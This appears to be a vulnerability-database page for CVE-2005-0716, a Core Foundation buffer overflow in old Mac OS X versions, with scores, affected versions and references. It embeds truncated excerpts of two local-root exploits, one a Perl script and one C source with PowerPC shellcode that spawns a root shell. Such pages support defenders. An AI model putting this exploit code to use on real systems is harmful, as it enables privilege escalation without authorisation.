CVE-2005-0716
published 2005-03-21CVE-2005-0716: Stack-based buffer overflow in the Core Foundation Library in Mac OS X 10.3.5 and 10.3.6, and possibly earlier versions, allows local users to execute…
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.05%
60.0th percentile
Stack-based buffer overflow in the Core Foundation Library in Mac OS X 10.3.5 and 10.3.6, and possibly earlier versions, allows local users to execute arbitrary code via a long CF_CHARSET_PATH environment variable.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow (2)
exploitdb·2006-08-02
CVE-2005-0716 Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow (2)
Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow (2)
---
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo.
#
# I got sick of pressing enter on v9's exploit. It gets in the way when scripting attacks.
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#
foreach $key (keys %ENV) {
delete $ENV{$key};
}
#// ppc execve() code by b-r00t + nemo to
Exploit-DB
Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation
exploitdb·2005-03-22
CVE-2005-0716 Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation
Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation
---
/*[ MacOS X[CF_CHARSET_PATH]: local root exploit. ]*********
* *
* by: [email protected] (fakehalo/realhalo) *
* *
* found by: iDefense (anon finder) *
* *
* saw the advisory on bugtraq and figured i'd slap this *
* together, so simple i had to. exploits via the *
* /usr/bin/su binary. you must press ENTER at the *
* "Password: " prompt. *
***********************************************************/
#include
#include
#include
#include
static char exec[]= /* b-r00t's setuid(0)+exec(/bin/sh). */
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb"
"\x01\x70\x39\x40\x01\x70\x39\x1f\xfe\xdf\x7c\x68\x19\xae"
"\x38\x0a\xfe\xa7\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xa5"
"\x2a\x79\x38\x7f\xfe\xd8\x90
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2005/Mar/msg00000.htmlhttp://www.idefense.com/application/poi/display?id=219&type=vulnerabilitieshttp://www.securityfocus.com/bid/13224http://lists.apple.com/archives/security-announce/2005/Mar/msg00000.htmlhttp://www.idefense.com/application/poi/display?id=219&type=vulnerabilitieshttp://www.securityfocus.com/bid/13224
2005-03-21
Published